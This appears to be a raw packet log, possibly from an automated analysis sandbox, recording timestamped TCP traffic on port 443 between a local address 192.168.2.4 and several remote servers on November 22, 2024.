                                                                                                                                                                                                            Nov 22, 2024 04:26:45.250391006 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.250478029 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.250511885 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.279983044 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.295116901 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.295166969 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.336924076 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.683284998 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.727413893 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737596035 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737607002 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737642050 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737669945 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737687111 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737704039 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737724066 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737740993 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737768888 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.737797976 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.743850946 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.743886948 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.743896008 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.743916988 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.743930101 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.743957043 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.743967056 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.744019985 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.744055033 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.744055033 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.744088888 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.929267883 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.929280043 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.929325104 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.929347992 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.929368019 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.929382086 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.929399967 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.933334112 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.933396101 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.933423996 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.933466911 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.933500051 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.933521986 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.978904009 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.978933096 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.979012966 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.979033947 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:45.979087114 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.003362894 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.003382921 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.003423929 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.003456116 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.003474951 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.003490925 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.015196085 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.015244961 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.015264988 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.015281916 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.015325069 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.015613079 CET49776443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.015635014 CET4434977613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.115032911 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.115099907 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.115163088 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.115201950 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.115228891 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.115345955 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.147006989 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.147063971 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.147094011 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.147128105 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.147161961 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.147187948 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.167211056 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.167257071 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.167287111 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.167300940 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.167330027 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.167347908 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.184487104 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.184510946 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.184565067 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.184577942 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.184608936 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.184631109 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.310643911 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.310698986 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.310785055 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.310827017 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.310950994 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.310950994 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.326913118 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.326961040 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.327033043 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.327066898 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.327094078 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.327584028 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.343211889 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.343257904 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.343447924 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.343513966 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.343559980 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.343585968 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.357278109 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.357322931 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.357398033 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.357423067 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.357592106 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.357592106 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.373982906 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.374027967 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.374105930 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.374176979 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.374219894 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.374257088 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.374317884 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.374599934 CET49777443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:46.374634981 CET4434977713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:48.329602957 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:48.329684973 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:48.329762936 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:48.522212982 CET49759443192.168.2.4142.250.181.100
                                                                                                                                                                                                            Nov 22, 2024 04:26:48.522224903 CET44349759142.250.181.100192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:54.107161045 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:54.107219934 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:54.107685089 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:54.108031988 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:54.108051062 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.361772060 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.361851931 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.361960888 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.362293005 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.362319946 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.957524061 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.957655907 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.959295988 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.959332943 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.959587097 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:55.968132973 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.015356064 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.449568033 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.449587107 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.449599028 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.449664116 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.449702978 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.449732065 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.449754953 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.649388075 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.649410963 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.649477959 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.649563074 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.649597883 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.649621964 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.684446096 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.684461117 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.684520960 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.684536934 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.684586048 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.831355095 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.831374884 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.831427097 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.831489086 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.831527948 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.831551075 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.860963106 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.860977888 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.861033916 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.861063957 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.861102104 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.882416964 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.882431984 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.882492065 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.882507086 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.882579088 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.899610996 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.899626017 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.899693966 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.899708033 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:56.899756908 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.040473938 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.040497065 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.040580034 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.040605068 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.040661097 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.056299925 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.056313992 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.056397915 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.056412935 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.056466103 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.070036888 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.070050001 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.070144892 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.070159912 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.070221901 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.081197977 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.081212997 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.081270933 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.081285000 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.081335068 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.092315912 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.092331886 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.092386961 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.092401028 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.092447996 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.103017092 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.103030920 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.103080988 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.103091955 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.103142023 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.107470036 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.107532978 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.107537031 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.107587099 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.107650042 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.107686043 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.107712030 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.107728958 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.156552076 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.156595945 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.156661987 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.157159090 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.157202005 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.157257080 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.158641100 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.158651114 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.158705950 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.159504890 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.159528971 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.159584045 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160324097 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160346985 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160406113 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160509109 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160527945 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160612106 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160626888 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160691977 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160706997 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160767078 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160778999 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160856009 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.160873890 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.169079065 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.169159889 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.170689106 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.170700073 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.170929909 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.179877043 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.223340988 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.888382912 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.888458014 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.888503075 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.888550043 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.888621092 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.888659000 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.888684988 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924396038 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924464941 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924534082 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924556971 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924588919 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924704075 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924756050 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924838066 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924838066 CET49830443192.168.2.452.149.20.212
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924876928 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:57.924902916 CET4434983052.149.20.212192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.899081945 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.906157970 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.906179905 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.912249088 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.912256002 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.915692091 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.919781923 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.919792891 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.920484066 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.920488119 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.947566986 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.957737923 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.957767963 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.958321095 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:58.958328962 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.007672071 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.008246899 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:26:59.008285046 CET4434984013.107.246.63192.168.2.4
